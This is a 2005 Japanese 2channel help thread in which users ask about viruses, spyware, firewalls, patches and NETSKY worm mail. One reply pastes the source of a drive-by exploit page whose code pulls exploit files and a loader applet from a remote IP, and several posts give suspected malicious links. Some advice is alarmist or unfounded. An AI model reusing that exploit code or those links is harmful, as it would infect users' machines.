　　 .ﾞl,　　.,/｀∪　 ﾞ〃 .`ｰ--丿　.ﾞ'--ヽ{,,,.／　 .ﾞl,,　　_/｀∪　.ﾞl.,i´　 .!,_,,,／ .lﾞ../ |　.,i´
　　　∪￣　　　　 ∪　　　| |　　　　　　∪ 　　　　　| |　　　　 ∪　　　　　　　　　∪
　　　　　　　　　　　　　　 .∪　　　　　　　　　　　　 ∪

　　‐ニ三ニ‐　　　　　‐ニ三ニ‐　　　　　　　　　‐ニ三ニ‐ 　　　　　　　　　　‐ニ三ニ‐

　　　　　　　　　　　　　　　　　　,.‐-､,_　 _,!_>　　　　　 r‐--------, /,ゝ　　　　,-''"""''ヽ、
　　　/￣￣￣￣￣￣ヽ,　　　　"‐､,_ ,l　＼ゝ　　　　　.|＿＿＿__＿_!l'_ゝ　　　i´　ｒ'""`'、 ヽ
　　　`---------y　　／　　/'''-､　　　 　 ,ノヽ、　 r‐-----------┐　　　　ﾞ‐''　　　 ）　|
　　　　　 ,.-､　.,／　／　　　　`‐､_~i'　　 ／ .／　　 |,,,,,,,,,,,,,,､　.,,,,,,,,,,,,,,|　　　　　　　　,／ ,.ﾉ
　　　　　ヽ、 ｀''｀,／　　　　　　　　　 ,.,／　／　　　　　　　 │ │　　　　　　　　　　lﾞ　ｒ'
　　　　　　 ＼　 ヽ　　　　　　　 _,..／ _.,／　　　　　　　　 ,,/　 /　　　　　　　　　　.└┘
　　　　　　　 .｀'､,ﾉ　　　　　　<'’　_,／　　　　　　　　　ｒ'"　 ,,/　　　　　　　　　　　 /"`､
　　　　　　　　　　　　　　　　　ﾞ‐'’　　　　　　　　　　　 `v '"　　　　　　　　　　　　 `-‐｀

圧縮ファイルを解凍するだけで感染するウィルスというのはありますか？
拡張子のフェイクが無い場合でお願いします。

http://5sec.biz/acc54/counter.htm　　

↑のURL踏んでしまいました
ウイルスに感染しましたかね？

>>666
インラインフレームでトロイ入りの.exeを呼び出してるね
「Trojan-Proxy.Win32.Mitglieder.cm」（ベンダーによって命名は異なるかも）

>>667
よくわかりませんが、トレンドマイクロオンラインで調べてます
ＡＶＧしかありません。
どうしたらいいでしょうか？

質問ですが、これはどういう事ですか？
↓
227 ：名無しさん＠５周年：2005/03/23(水) 00:04:54
なはは！面白いもん見つけた。
ブラウザーでアクセス出来るぞ〜

　ftp://ftp.livedoor.com/

フォルダを指定して、そのフォルダ内のファイルの追加、削除、更新を規制するようなツールはないでしょうか？
探してもいいのが見つからなくて困っています。

>>670
ttp://pc8.2ch.net/test/read.cgi/software/1111035729/l50

イーアクセスのADSL50Mのモデムって、ルータタイプだから
ファイアーウォールって入れなくてもいいんじゃないの？
それとも入れないとやばいの？

>>670
OSがWindowsXPなら、NTFSのアクセス権を設定するとか。

>>672
漏れはルータとFW併用している。やばいかどうかは考え方次第。
ルータとFWの機能の違いを調べて自分に必要か判断して。

ルータは外部からの接続を防いでFWはPC内部から外部への情報を送信するのをラン＆ガン。

〔注意〕して下さい
ttp://alink.uic.to/user/ararara.html
これはなんですか？？
ウィルスの類ですか？？
対処法を教えてください。
よろしくお願いします。

＞「IE'en」を公開した。このツールは任意のユーザーのログオン情報（ユーザー名とパスワード）を知っていれば，
＞そのユーザーが使っているPCで動作しているInternet Explorer（IE）にネットワーク経由で接続し，
＞そのIEが現在表示しているWebページのURLや，Webサイトに対して送信したパスワードなどの情報が取得できることを明らかにした。


ユーザーアカウントにパスワード設定してない場合はどうなるんですか？

あうと。あいーんはどうでもいいでしょ。ルーターもってりゃかん毛ないピー

>675
マルチ。板違い。ラウンジ板http://etc3.2ch.net/entrance/

>>675
マルチ。板違い。
★★『幸福の科学』統合スレッドpart109★★
http://life7.2ch.net/test/read.cgi/psy/1110784744/

OSはWindows98、ブラウザはIE6.0、セキュリティはNAV体験版（もうすぐ期限切れ）とSpybotS&Dです。
FW関係のソフトは全く入っていません。
プロバイダはOCNですが、メールのウイルスチェックサービスは受けていません。
WindowsUpdateはこまめにしています。

そこで質問なんですが、今後の対策として、
１）NAV製品版とFWソフト（ZONE ALARMを検討中）
SpybotS&D、Ad-aware（一つだけでは漏れがあるらしいので）をいれる
２）NortonInternetSecurity2005と、SpybotS&D、Ad-awareをいれる
３）ウイルスバスター2005とSpybotS&D、Ad-awareをいれる
どれがより快適（負荷がかからない、ストレスを感じない）で、安全なのでしょうか？
それとも他にもっと良い対策があるのでしょうか？
アドバイスいただけますか？
よろしくお願いします。

>>680
PCのスペックも書かないと、どれがより快適で安全かなんて言えないよ

>>680
NOD32+OutpostProの組み合わせはかなり軽いよ

>>682
NOD32のヒューリスティックスキャンや検索スピードが異次元なのは事実。
ただ、OutpostProと組み合わせるのはどうか？機能的に抜けが多すぎる。

>>681
すいませんでした。
えっと、これのことでしょうか？
“Pentium(r)�U Processor Intel MMX(TM) technology”
（取説にはCeleron TM プロセッサ（133MHz）と書いてありました。）
違うところを見ているのでしょうか？
同じものを指しているように思えないのですが。
自分のわからなさ加減に涙が出ます…。

>>682
ありがとうございます。
両方とも上級者さんにしか使えなさそうなイメージがあって、あえて避けていましたが、
軽いとの意見をいただいたので、さっそく検討してみます。

ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi

これ調べたら「厨房ホイホイ」というブラクラとのこと。
というか、厨房ホイホイって何なんだ！？
踏んでしまったのですが、危険なんでしょうか・・・IP抜きのトラップだとかなんとか・・・

どなたかよろしければ詳細や対処法を教えてください。
板違いだったらゴメンナサイホント

>>685
IP知られるだけで、無害ですよ

>>686

あ、そうなんですか。どうもありがとう。
わけわからんから軽く不安でしたが、救われました！

>>687
騙されるな。それスパイウェアも仕込まれてるから、
はやく検索して除去しないとヤバイ。

>>688

『Spybot - Search & Destroy』で調べてみましたが、検出されませんでした。
ソフトが悪いんですかね・・・

>>689
ウイルスと違って、伝播しないスパイウェアのカバー率は６０％程度。
レジストリチェッカーで調べてみ。

>>685
板違い。この板では鑑定はやらない。
こんどからラウンジ＠2ch掲示板http://etc3.2ch.net/entrance/の
勇気が無くて見られない画像解説スレ Part681
http://etc3.2ch.net/test/read.cgi/entrance/1111340653/l50で訊いてくれ。

>>690

アドバイスありがとう。

>>691
ゴメンナサイ。次から気を付けますね。

ウィルスバスターの評価版を入れたいです。
接続がダイヤルアップなので他のPC(仮にA)で落として
それをCDRに焼いてBのPCにインストールする事は可能ですか？

>>693
可能かのう

ノートンのインターネットセキュリティを常駐させていて（ファイアーウォールのセキュリティレベルは高）、
シマンテックのセキュリティチェックでも、安全だと言われましたのでセキュリティそのものは大丈夫だと思うのですが。


何回も攻撃を受けて遮断しているという状態です。
一・二回侵入を試みられる程度だったら良いのですが、朝11時頃から数えて、1974回にも達してます。
攻撃を受けるとその攻撃側コンピュータを自動遮断するという機能をＯＮにしておいてますが。
それでも一向に減る気配がありません。
あまりに異常な状態だと思うのですが、どの様にすれば、攻撃が無くなってくれるでしょうか？


一度、モデムとルータとＰＣの電源を切った後で接続しなおしましたが、一向に減ってくれる気配がありません。


ＯＳはＷｉｎＸＰ、ＣＡＴＶ回線でプロバイダはＩＴＳＣＯＭの　ttp://www.itscom.net/internet/cable/wide/index.html
この接続プランで、ルータはバッファローのWHR2-G54を使っています。
ポートは全部空けてしまっていますが、ノートンインターネットセキュリティの設定で、未使用ポートを秘匿して、
リモートコンピュータから見えなくしています。（らしいです。）


どうか宜しくお願いいたします。

プロバイダにログ提出しろ。

気休め
http://pc8.2ch.net/test/read.cgi/sec/1020183534/l50

>>695
ワームがノックしてるだけと思われ
ルータにステルスモードとパケットフィルタ無ければ
ノックは何時までも（ｒｙ
CATV回線自体が（ｒｙ

ノートン2002のLive updateができません それとシステムの保護の有効・無効もできないんですが どうすればいいのでしょうか？

マジレスするとﾉｰﾄﾝスレ池

すいませんでした

>>699
すまん ﾉｰﾄﾝの質問スレが分かんない

ノートンスレがまだ立ってないのでここで質問

今日はじめて導入してウイルススキャンしているのですが
駆除したウイルスの情報がものすごい勢いでポップアップして止まりません
うっとおしいので出ないようにしたいのですがどうすればいいですか？

>>701
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ Ver.62【2005】
http://pc8.2ch.net/test/read.cgi/sec/1111603203/l50

つーか 2002ってまだサポートしてんのか？

>>701
分かんないじゃないだろ、このはなたれ小僧がっ!!

これを踏んだらノートンガ反応したんですけど、
PCにどんな被害があるんですか？
http://f11.aaa.livedoor.jp/~hiho/imgboard/wall/img-box/img20041127040903.jpg

>>705
ソース見たけど、ノートンで防げないスパイウェアもあるな。４つぐらい仕込まれてる。
その中の一つにノートンが反応してる。

>>705
直リンするな。
鑑定ならラウンジhttp://etc3.2ch.net/entrance/の「勇気が無くて見られない画像解説スレ」逝け
そのスレの過去ログを検索すれば分かることも多い。

６８５、７０５のような直リンする馬鹿は樹海に行ってくれ

以後直リンする馬鹿は無視してください

>>705
あひぃぃ！やられた。やめてくれ。

>>696-697
ありがとうございます。
なんとか頑張ろうと思います ・ﾟ・(つД｀)・ﾟ・

>>705他
http://213.159.117.133/dl/ms.php
いつまでもくだらねえ事やってるんじゃねえ
これに反応してるだけじゃねえかよ
さっさとウィンドウズアップデートしろ
８月のパッチで完全対応しているわ

<html><head>
</head><body>
<style>
* {CURSOR: url("http://213.159.117.133/dl/ms/sploit.anr")}
</style>
<script>
try{
document.write('<object data="？'+109+';s-its:mhtml'+':'+'file://C:\\nosuch.mht!http://213.159.117.133/dl/ms/x.chm::/x.htm" type="text/x-scriptlet"></object>');
document.write('<applet'+' width=1 height=1 '+'ARCHIVE=loader'+'ms.jar co'+'de=Counter></AP'+'PLET>');
}catch(e){}
</script>
</body></html>

ほらよ　ついでにソースも貼っといてやるわ

わざわざすみません。
でもウィンドウズアップデートはしたはずです。
それでも反応します・・・

>>714
そりゃ反応はするべさ
Exploit-MhtRedir.genてウィルスコードで
昔のセキュリティホールを突いてスパイウェアを強制インストールするの
今はもう感染しないが、検出してくれなきゃ困る人もいるべさ
http://www.microsoft.com/japan/security/incident/download_ject.mspx

>>714
http://69.50.191.68/eb/be/count.html
こっちが今死んでいるからな
たまに復帰するんだよ　嫌らしいサイトだ

システムの復元でスパイウェアを直した次の日に　自分のミスで
もう一回同じのにかかってしまったんですが次は何回やっても直せません・・・
まじでどうしようかわかりません　お願いですから教えてください

>>717
リカバリー

>>717 リカバリーってなんですか？　無知ですいません・・・
　　　あと電源つけたら変なページが開きまくってほとんど操作できない状態です。

>>718 でした　すいませんorz

damenaninngennhakorosunogaitibannii//

>719
パソコン買ったときについてた説明書嫁

お願いします　本当にお願いします（＞＜）
何で復元ができなくなったのかもわからないのです
終わったかなと思ったら　復元はできませんでしたってでるのです・・・。
助けてくださいお願いします

親からもらったＰＣなので説明書とか詳しいことはわかりません。
ほんとに教えて君で申しあけありませんがこのままでは夜も眠れません・・・。
どうにかすくってください　本当にお願いします

これで完璧
ttp://fileman.n1e.jp/TOP.PHP?mnu=SHOW&ft=1&fid=3-24b5ghei

>724
親からもらったんなら親に聞け

親にはあんまりいいたくないんですよね・・・　すいません
今までは自分で解決できたんですが今回はほんとにだめで真剣にあせってます

くわしい理由を言わずに、ただ取説探してもらえばええやん。
あと、ちゃんと、パソコン付属のCD-ROMなんかはあるよね？
見当たらないなら、説明書と一緒に探しておきなさい。リカバリに必要な場合があるから。

パソコン起動させてWindowsのロゴ出る前にF8押してセーフモード
その状態で駆除試みて

>>728
>>729
レス助かりますとりあえず今は親がいないのでセーフモードでやってみます
　　　駆除って復元とちがうんですよね？　復元はもうできないんでしょうか？　
　　　ノートンで検索して消してみますね

セーフモードにしたんですけど　どうやって駆除すればいいのか分かりません；；
セーフモードではオンラインスキャンもできないですしどうすればいいいのでしょうか？

>>731
進で来い
おまえの頭で出来る事はない

とりあえずテンプレにあるスパイウェア駆除ソフト入れれば

>>717
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】

とりあえずこれに答えれ

これ便利そうなんだけど　評価はどうですか　
>>１台のPCでセキュアな２つのWindows環境を実現
>>機密データの安全性を大幅に向上　
>>ttp://www.hitachi-sk.co.jp/News/News306.html

>>735
確かに便利そうだね。これで、基本台帳が添付されてインターネットに晒されるってことは無いわけだね。
ただ、扱うのは人間だから、ヒューマンエラーがあれば、なんぼでも流出するとは思うけど。

ウイルスキラースレで質問をしたのですが、他スレへ誘導されたので
質問させて下さい。

OS:Win98　IE6SP
使用ソフト：ウイルスキラー2005

先程スキャンをかけたら「TrojanDownloader.win32.ayb」という
トロイらしきウイルスが見つかりました。処理は「無視」。
パスはIEXPLORE.EXE>>C:\WINDOWS\TEMP\NWWDMOAA.EXEです。
TEMPの中にはそれらしきファイルもフォルダも見当たらなく、
スキャンをかけたのは「メモリ」という項目だけなんです。
要するに、どこに感染しているファイルがあるのかが知りたいのです。
厨な質問ですみません。

TrojanDownloaderで検索してみたのですが、
色々種類がありすぎてどの処置を施せばいいのかわかりません。
かと言って、
TrojanDownloader.win32.aybで検索をするとウイルスキラーの
対応ウイルスのページが引っかかるだけで・・・。
行き詰まってます。どなたか知恵を貸して下さいませ。

アンチウィルスソフト常駐させてても
ＦＷ入れてなければウィルスに簡単に感染しますか？

>>738
はい。
とはいえ、基本的にワームの侵入に対しては、ＦＷはなんであってもあればいいという種類。

>>737
それ、Tempフォルダに一時展開されてウィルス検知されているパターンだね
本体は別のファイル
それを削除しなければ解決しない
レジストリのRunをミロ

>>739
レスどうもありがとうございます。

これって？
http://syobon.com/upload/src/syobon22628.zip.html
ウィルスですか
このファイルダウンロードして2ｃｈ女神拾い物リンク集.exe
ってファイルダブルクリックしたら
ハードディスク初期化準備中ってでて
キャンセルしようとするとIDとパスワードもとめられたので
しらないので閉じようとしても閉じれないので
強制終了しようとしたら
「失敗したので終了します」って出て閉じたのですが
そしてしっぱいしたんですが・・・・
不安で仕方ないので誰かこの詳細を教えてください

すいません
OSはXP　SP1
マカフィーさんを常駐させてます

>>743
マルチポストには絶対に答えません。

じゃああきらめますわ
どうもすいませんでした

windowsXP　ウィルスバスター2005　IE6　使用
ウィルスバスターのセキュリティ診断をしたら、既知のセキュリティーホールが見つかりました。
MS05-004（重要）とMS05-009（緊急）です。
WindowsUPdateを実行するとOSの修正プログラムをダウンロードできます。
という画面がでて先に進んだら、優先度の高い更新プログラムに「WindowsXPSP2」だけしかありません。
どうすればいいでしょうか？

膨大な量のメールの中には非常に貴重な「情報」も含まれています。それらの内容を
貴社はきちんと把握し、メールの保存や消去等を責任をもって管理していますか？
『数が多すぎて無理！』では、企業としての信頼失墜も避けられないのでは

>>746
.NET Framework 1.1 Service Pack 1 を入れているよな？。だったらダウソ、インスコ汁
ttp://www.microsoft.com/downloads/details.aspx?FamilyID=8ec6fb8a-29eb-49cf-9dbc-1a0dc2273ff9&DisplayLang=ja

Windows Media Player 9 を入れているよな？。だったら
日本語 Windows Media Player 9 Series for Windows XP をダウソ、インスコ汁
ttp://support.microsoft.com/kb/888407

>>746
MS05-004
ttp://www.microsoft.com/japan/security/bulletins/ms05-004e.mspx

MS05-009
ttp://www.microsoft.com/japan/security/bulletins/ms05-009e.mspx


これでわかるかい？

かぶった。。。ｽﾏｿ

どんまい
補足すっとMS05-009よりKB888407が新しい
つまりKB888407インスコでMS05-009もインスコした事になる

windowsXP　ウィルスバスター2005　IE6　使用 です。

Ad-Aware等を入れないと、バスターではスパイウェアは検出できないという
話を聞いたんですけど、バスター２００５だけではダメなんでしょうか？
バスターもスパイウエアを検出すると思うんですけど。

>>748
Service Pack1じゃなくJapaneseLanguagePackです。
インストールできませんでした・・・・

>>752
バスターだと検出はしても削除等はできないんじゃなかったかな？
見つけるだけと退治してきれるのとは別問題だからね。

>>754
見つけて毎日自分で削除していけば良いでしょうか？

>>740
解答ありがとうございます。
レジストリエディタを起動させて
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
を見ればいいですよね。
具体的に、どの値を削除すれば良いのかわかりません・・。

あれService Packなしか？
じゃこれ入れてから
Microsoft .NET Framework 1.1 Service Pack 1
ttp://www.microsoft.com/downloads/details.aspx?FamilyID=a8f5654f-088e-40b2-bbdb-a83353618b38&DisplayLang=ja
再度これでどう？
ttp://www.microsoft.com/downloads/details.aspx?FamilyID=8ec6fb8a-29eb-49cf-9dbc-1a0dc2273ff9&DisplayLang=ja

>>756
全部貼り付けて聞けばいいじゃない

>>758
ありがとうございます。
貼り付けさせて下さい。

「Cast Web Lies Bait」C:\WINDOWS\Application Data\FlagBeepCastWeb\Plus Comp.exe
「LoadPowerProfile」Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
「LoadQM」loadqm.exe
「mdac_runonce」C:\WINDOWS\SYSTEM\runonce.exe
「QuickTime Task」"C:\WINDOWS\SYSTEM\QTTASK.EXE" -atboottime
「RavMon」C:\Program Files\Rising\Rav\RavMon.exe -system
「RavTimer」C:\Program Files\Rising\Rav\RavTimer.exe
「RfwMain」C:\Program Files\Rising\Rfw\rfwmain.exe
「ScanRegistry」c:\windows\scanregw.exe /autorun
「SystemTray」SysTray.Exe
「TaskMonitor」c:\windows\taskmon.exe

です。見づらいかもしれませんがよろしくお願いします。

>>759
全部正規ファイルみたいだな、心配なさそうだぞ。

900 名前：最低人類０号 投稿日：2005/03/24(木) 13:57:12 ID:IanK/MEA
>>899
これはwikiのデータベースへ記載する価値あるかもねｗｗｗ

雑音センセイの避難所
ttp://jbbs.livedoor.jp/computer/19209/#1
管理人雑音センセイのご挨拶
「あの掲示板では雑音、録音という単語は使用できない。使用した人間は即刻アク禁にしてやる」

>>760　ありがとうございます。
何度もすみません・・・＞皆様

Runに問題が無いという事は他のディレクトリが怪しいかもしれませんよね。
個人的にちょっと変かな、と思ったのは
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
の、「Search Bar」tp://www.evqwopxmwis.com/azQPzHFLU1CJgPsHFP5Pu64jitpFfSbiOIphWa5DOMd2l6YbZszcaLFX8W0GVPm2.jsp
です。(htを省いています)どうでしょうか・・。

ごめんなさい。書き忘れです。
何故怪しいと思ったかというと、ウイルスキラーのレジストリ監視が
何度も「”Search Bar”を↑のURLに書き換え」で許可か禁止かの選択を
求めてきたからです。かなり頻繁に。
私の勘違いだったらごめんなさい。

>>763
そのURLでの被害報告は1件もないですね、
念の為↓でスキャンすることをお薦めします。

アンチドートを語ろう♪ MAP02
http://pc8.2ch.net/test/read.cgi/sec/1098644237/

最近スパイウェアに感染して、spybotというソフトを使って駆除できたのですが、
「Best Search Engine!!!」というデスクトップ右下に現れる変なプログラムが削除できませン。
削除しようとすると「boln.dllでエラーが発生しました。エントリがありません」と出てどうしようも出きません。
そのせいか知りませんが、再起動すると駆除したはずのスパイウェアがまたインストロールされてしまいます。
このsearch engineとかいうプログラムの削除の方法を教えてください。

>>765
インストロール???
釣りっぽいがセーフモードでスキャンしてみろ

>>766
釣りじゃないです。素で間違えました。
セーフモードでスキャンとはどのように行なうのですか？
spybotのツールにはありませんでしたか。

ノートンインタネットセキュリティのスレが落ちてしまい見つかりません。
誰かリンク張って！

>>767
自分でセーフモードで起動して、
その後、botでスキャンするだけ。
起動の仕方わからんって言われそうなんで
http://www.reiko-gakuen.net/seitokai/04.htm
自分の使ってるOSに合わせてやってみ。

>>768
よく探せ。すぐ見つかる

>>764
わざわざすみません。
DLしてレジストリをスキャンしてみましたが、感染０と出ました。
一体なんなのでしょう・・・。

>>769
セーフモードでスキャンしてもsearch engineは引っかかりませんでした。
ウィルスにでも感染しているのでしょうか。

>>771
ウィルスと思うなら
シマンテックかトレンドマイクロのオンラインスキャンためしてみ。

スパイウェア削除ツールはbotだけ?
Ad-awareSeも試してみたらどーよ?

2000sp4でルーターとKerio4.12のファイアーウォールを使ってネットに接続してるんだけど、
ファイアーウォールにアタック阻止のログが残ってるって事は、ルーターを突破されたって事なんですか？

ルーター突破しないよNATしてるんだから。ポートフォワーディングや
DMZの設定をルーターでしてるなら話は別だが。
ブラウザ経由のIDSのログなんじゃないの？

>>770
ウィルス&スパイウェアではなさそうですね。

そうですね

>>774
サンクス
ポートフォワーディングやってるから、それが原因っぽい。
ログにポートスキャンされた痕跡が残ってたから心配したよ。

WindowsXP IE6
ﾉｰﾄﾝｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨｰ、ｱﾝﾁｳｨﾙｽ、ｱﾝﾁｽﾊﾟﾑ

ﾎｰﾑﾍﾟｰｼﾞﾋﾞﾙﾀﾞｰ2000に付属のftpｿﾌﾄでｻｰﾊﾞｰにﾌｧｲﾙ転送しようと
したところ、ﾉｰﾄﾝのﾀﾞｲｱﾛｸﾞが起動し、
『○○に接続しようとしています、どうしますか』と聞かれ
『推奨』の方法で『OK』を選択したらｻｰﾊﾞｰに接続できなくなってしまいました。

どこをどう設定しなおせばよいのでしょうか？

i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i　　　　!|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|　 / |　　　/ |　┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!　　　/,_ ┴─/　ヽ　 　 　 |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||　　　　　（_゜.,》.'(_゜,》)ﾐ ヽ　　　　　 　! | |!i||!|ii||!|ii|
i|ii　　　　　　　 / ,,_＿,ニ、、 ﾉ( |　　　　　　　　　　　i|i!|i|
|i　　　　　　　　|　Y~~/~y} ｀,　~ |　 そ、そんなー… 　 |i
!.　　　　　 　 　 | ,k.,.,!,.,.,r|　,!　 く　　 　 　 　 　 　 　 　 .!
i　　　　　　　 ／ <ニニニ'ノ 　 　＼　　 　 　 　 　 　 　 ｌ

見失ったかな？
>>746 >>753
には
>>757
ね

なんか照れるなｗｗ

ＸＰ・ＩＥ６・ウイルスバスター２００５のみ使用
他スレでスパイウェア対策はウイルスバスターだけでは不十分と
出ていたのですが、ソフト類に無知で、検索してみたのですが、
何をどうすれば良いのかわかりません。例えば、ファイアーウォール
は、ＸＰ自体についてるものとバスターのものは両立できないというし
ＸＰの方を無効にしたりした覚えがあるのですが、スパイウェアソフトは
別の物を入れてもバスターと両立できるものなのなのでしょうか？
とりあえず、パソコンを普通に使用する一般家庭（企業秘密とかを持つ
会社ではない）の者で、ネットショッピングはよくします。バスターだけでは
不十分でしたら、何（どういうソフト）をどこで買えば良いかとか全くわからない
中年ｗですので情報よろしくお願いします。

うーん、害も無さそうだししばらく様子を見ようと思ったのですが
先程またスキャンをかけてみた所、「TrojanClicker.Win32.Pskey.a」に
変身しておりました・・・。亜種なのか、検索しても情報無し。
謎すぎます。どこに本体がいるのでしょう。。

>>782
>>752とちゃうの？

ウィルスとスパイウェアは別で考えれ。
だからスパイウェア対策ソフトとバスターは共存できる。
買わんでもええ。
>>6の上2つ(フリーソフト)を入れときなはれ。

>>783
ウィルスのカバー率は８０％〜９０％程度です。つまり、常に１０％〜２０％は対応できないウィルスに出会う可能性があるのです。
極めて慎重に行動していて、初めてアンチウイルスソフトは意味があるのです。
つまり、あなたのように野放図にアングラサイトや違法なソフトの使用をしていれば必ず回復不能なダメージを負うのは当然のことなのです。

ちなみに、あなたが感染したのは複合ウィルスと呼ばれ、複数のウィルスをパッケージにして、感染するタイプのようです。
この手のウイルスは相互にバックアップして感染するので片方を削除しても、片方が生き残れば、また作成しますし、
常駐して削除を監視していますから、削除は相当困難です。また、カーネルrootkitsの可能性もあります。

ttp://www.itmedia.co.jp/enterprise/articles/0502/18/news027.html

＞カーネルrootkitsは感染したマシン上で密かに動作し、
＞現行のセキュリティ製品ではほとんど検出不可能、
＞中には暗号化まで利用するものもある。（IDG）

XPsp2,OE6,ウィルスバスター2005使用

NETSKY.Qの攻撃が止まりません。多分他者からの攻撃だと。
その他者を特定したいのですがどうすればいいでしょうか？

私のアドレスが漏れた軌跡は
私→Ａさん→Ｂさん　Ａ、Ｂさんが感染
Ａさんは対策ソフト導入、ウィルス除去
Ｂさんは誰なのか不明

>>785
回答ありがとうございます。
大変参考になりました。
が、アングラサイトや違法ソフトは一切使用しておりません。
その手の話を聞いても、私のスペックでは理解すらできかねます。
えと、感染法というのはアングラサイトを覗いたり違法ソフトの使用のみなのでしょうか？

カーネルrootkits厨ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

ああ、この前の子かぁ。同じくｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

>>784
ありがとうございます。
リンク先、２つとも見てみたのですが、外国語なので全く
読めません･･･
で、フリーソフトという事ですが、無料なんですよね
無料でもアップデートとかできるんでしょうか？
また、無料というのが気になるのです。（ただほど怖いものは無いって言うし）
なぜ、無料でそのような便利なソフトを提供されてるんだろう、何か
メリットでもあるんだろうか？と考えてしまうのは素人考えでしょうか？

>>786
その軌跡間違ってるよ。
感染したBさんのPC内にあなたとAさんのアドレスが存在し、
ウイルスがAさんの名を語ってあなたにメールしてるだけ。当然逆もありうる。

ややこしいのでもう一度
XPsp2,OE6,ウィルスバスター2005使用

NETSKY.Qの攻撃が止まりません。多分他者からの攻撃だと。
その他者を特定したいのですがどうすればいいでしょうか？

私のアドレスが漏れた軌跡は
私→Ａさん→Ｂさん　Ａ、Ｂさんが感染
Ａさんは対策ソフト導入、ウィルス除去
Ｂさんは誰なのか不明、送信者も不明のアドレス、
Ａ、Ｂさんの名前は多分今の所送信者として語ってません。
よろしくお願いします。

>>792
ややこしいのはあなた。別に攻撃なんて、めずらしくもなんともない。
放っておくのが吉。

>>782
それじゃあ　こっちを見なはれ
ttp://www.higaitaisaku.com/
↑
ここのスパイウェアのタブね。

＞フリーソフトという事ですが、無料なんですよね
yes

＞無料でもアップデートとかできるんでしょうか？
ok

＞また、無料というのが気になるのです。（ただほど怖いものは無いって言うし）
＞無料でそのような便利なソフトを提供されてるんだろう・・・
本来、営利目的ではない所だから。
そのあたりの事もたしか記載されとるから
サイト内をじっくり読んでみたらええ。

＞素人考えでしょうか？
最近では素人さんもたくさん使っておまっ。

ソフト製作者ってのは営利以外に満足感を得る人も実際多いんよ。
そのソフトの完成度にプライド持ってる人も多いし
それを皆が使って「ええやんけー━━━━━(ﾟ∀ﾟ)━━━━━!!!!」と
喜んでもらえるのが目的だったりする人もようけおる。
無料を疑心暗鬼に思う気持ちもわからんでもないけど
よく見てたら「無償の親切」ってモンもまだまだ転がってまっせ。

無理に使えとはよう言わんけど
あとは自分で考えとくれ。

>>793
感染してる相手を特定する事は不可能？
珍しくはないけどそんな迷惑な香具師を放置しておくのか？
しかも相手は会社ぽい。

見極める必要性はあるけど、ここでの質疑応答も言うなれば「無償の親切」だしな

>>792
相手してくれてる793に絡んでどうすんだよ

＞相手は会社ぽい。

どこでそう思う？

>>797
そうですね。793様申し訳ない。
まずウィルスが届くのが会社のメルアド、
Ａさんも会社、Ｂさんも会社だから。
ただＢさんというのが複数でかなり多いんです。
だから特定出来ないで困ってます。

ヘッダみろ。

>>799
知らないメルアドです。

追記。
ＡさんがＢさん(複数)に送ったメルアドどれにも該当しません。

Ｂは誰だかわからない(知らない)相手なんだよな？
フリーメールからＢ宛に「貴方のアドレスからウィルスメールが送られてきました」って
メールしてみれば？

つーか偽装メールは簡単には相手探れないぞ

>>802

それいい！ありがとう！！！！

やめなよ…迷惑だよ

>>803
あのね、メールのあて先はＨＰから収集したものを勝手に設定してくるの。
だから、感染した人間なんてのは全く分からないんですよ。

>>786-805
【差出人】WORM_NETSKY【詐称】
http://pc8.2ch.net/test/read.cgi/sec/1080741342/

ふむふむ、じゃあ返信してきた時に感染したメールも来たらヒットだよね？

>>807
それより、自分がメール送りまくってる状況になってないか
よく確認したほうがいいよ。

>>808サンキュ！
netsky.Qなんだけどちゃんとしたよ。
ウィルスバスター2005でチェックしてるしあとwindowsディレクトリも見た。
レジストリは見る必要あり？

誰だよ、変な方法教えたのは。
>>806のスレ見て、ヘッダの情報からプロバイダに対処してもらうんでいいだろ。
糞プロバだったらご愁傷様だが。

むむ、>>810さまありがとです！
早速調べてみます！
糞プロバじゃない事を祈って・・・

知らない人からメールで「あなたはウィルスに感染してます」って言われて
すぐに対策するぐらいなら、とっくに対策していると思われ。
読まずに捨てられるかもしれないし。そのメール自体怪しまれるかもしれない。

自分のプロバイダからきちんと説明されてはじめて、「そうなのか」と納得すると思うよ。
メールやり取りでトラブルに巻き込まれないとも限らないから、プロバイダに任せるべき。

792,798,801,803,807,809,811です。
３人から来ていました。うち1人は今日初めてだったみたいですが・・・
まず相手のメルアドが分からないのでプロバイダに連絡します。
ヘッダ送ってここからウィルス来てます、だけでOKでしょうか？

追記
NETSKY.Qです。

ヘッダなんか偽装されてるよー

皆の衆が完璧な追跡対策はないぞと言うてますやん・・・
プロバ連絡してあとは放置しときなはれ。

ヘッダのIPだけは固定だった。
連絡してみます。

はい、終了。
もう来ないでね。

詳しい経緯は良くわからないのですが、海外サイトを見てたらIEの
上の方に　viewpoint　というツールバーが表示されるように
なってしまいました
これはスパイウェアですか？

画像ファイルを踏む前に、ウィルスが入っていないか
調べる方法は無いのでしょうか
または画像ファイルを安全に見る手段は無いでしょうか
（ﾌﾞﾗｳｻﾞは最新のIEで、画像はjpgがほとんどです。
ｳｨﾙｽﾊﾞｽﾀｰが入ってますが一旦開いた画像しか
ｳｨﾙｽﾁｪｯｸ出来ないようです）

すみません
×画像ﾌｧｲﾙを踏む前に
